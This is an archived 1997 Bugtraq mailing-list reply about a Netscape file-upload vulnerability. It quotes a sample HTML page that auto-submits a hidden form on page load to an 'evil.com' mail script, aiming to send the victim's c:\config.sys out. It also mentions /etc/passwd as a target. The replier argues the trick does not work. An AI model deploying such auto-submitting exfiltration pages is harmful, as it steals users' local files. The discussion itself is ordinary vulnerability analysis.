Bugtraq mailing list archives
Re: Netscape Exploit
From: jferg () ACM ORG (Justin C. Ferguson)
Date: Sat, 14 Jun 1997 22:38:03 -0500
On Jun 14, you babbled something about:
Here is a sample it isn't complete but you get the basic idea of what is going on
<HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD> <BODY onLoad="daForm.submit()"> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive"> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar () evil com">
Unless I'm missing something here, this method _does_not_ work. This was my first idea when I first heard about the bug as well, but from what I can tell, it's not possible to set a value (or a defaultValue using JavaScript) for a file type input. The only way even remotely possible way I can see to do do this is perhaps through the fact that netscape caches form data for reposts, and some trick here regarding reloading the page. If anybody's interested in viewing the page I set up yesterday that does almost exactly what is listed above, it's at http://acm.cs.umr.edu/~jferg/test1.html. (Yes, I will guarantee that I'm not grabbing anybody's files here...) On a side note, is anyone else but me entertained by the fact that netscape claims this bug has "few real-world applications", since one must know the exact name and path of the file, yet unix systems are vulnerable? I'm thinking...ummm.../etc/passwd? *shrugs* JF -- Justin Ferguson - jferg () acm org - jferg () usgs gov - http://acm.cs.umr.edu/~jferg "I will stare at the sun until its light doesn't blind me...I will walk into the fire until its heat doesn't burn me...and I will feed the fire. And into the fire, I'm reunited, into the fire, I am the spark..." - Sarah McLachlan
Current thread:
- Re: Netscape Exploit Justin C. Ferguson (Jun 14)
- SunOS 4.1.4 ftp serious bug Homer W. Smith (Jun 15)
- Re: SunOS 4.1.4 ftp serious bug Francesco Messineo (Jun 16)
- Re: SunOS 4.1.4 ftp serious bug Joe Zbiciak (Jun 16)
- <Possible follow-ups>
- Re: Netscape Exploit Edwin Li-Kai Liu (Jun 15)
- Re: Netscape Exploit John Robert LoVerso (Jun 16)
- Re: Netscape Exploit Sevo Stille (Jun 15)
- SunOS 4.1.4 ftp serious bug Homer W. Smith (Jun 15)